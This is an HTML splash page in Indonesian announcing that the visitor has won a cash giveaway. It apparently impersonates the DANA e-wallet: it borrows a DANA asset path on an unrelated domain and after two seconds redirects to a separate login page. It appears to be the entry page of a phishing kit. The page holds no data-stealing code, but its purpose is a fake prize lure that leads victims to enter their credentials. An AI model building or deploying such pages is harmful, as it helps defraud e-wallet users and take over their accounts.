
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>GIVEAWAY UANG TUNAI</title>
    <meta name="description" content="Selamat anda Beruntung telah mendapatkan GIVEAWAY UANG TUNAI Sesuai Ketentuan Syarat yang Berlaku">
    <meta name="keywords" content=">GIVEAWAY UANG TUNAI">
    <link rel="icon" type="image/x-icon" href="asset/logo-index3.png">
    <link rel="apple-touch-icon" sizes="180x180" href="asset/logofavicon.jpg">
    <link rel="icon" type="image/png" sizes="32x32" href="asset/logofavicon.jpg">
    <link rel="icon" type="image/png" sizes="16x16" href="asset/logofavicon.jpg">
    <link rel="manifest" href="https://yongkru.skemabiayatarif.com/DANA/assets/img/favicon/site.webmanifest">
    <meta http-equiv="refresh" content="2; URL=login.html">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no">
    <style>
        @keyframes fadeInAnimation {
            90% { opacity: 1 }
            to { opacity: 0 }
        }
        body {
            animation: fadeInAnimation ease cubic-bezier(0.39, 0.575, 0.565, 1);
            animation-fill-mode: forwards;
            width: 100%;
            height: 100vh;
            margin: 0;
            padding: 0;
            background-color: #5babe0;
        }
        .dana_index {
            height: 50%;
            width: 50%;
            max-width: 780px;
            max-height: 720px;
            display: flex;
            justify-content: center;
            align-items: center;
            flex-direction: column;
            position: absolute;
            top: 50%;
            left: 50%;
            transform: translate(-50%, -50%);
            -webkit-transform: translate(-50%, -50%);
            -moz-transform: translate(-50%, -50%);
            -ms-transform: translate(-50%, -50%);
            -o-transform: translate(-50%, -50%);
        }
        img {
            width: 180px;
        }
        .logo {
            position: relative;
            margin-bottom: 15%;
            
        }
        .footer {
            position: absolute;
            bottom: 20px;
            width: 290px;
        }
    </style>
</head>
<body>
    <div class="dana_index">
        <img class="logo" src="asset/logofavicon.jpg" alt="Telegram Logo">
    </div>
    </body>
</html>
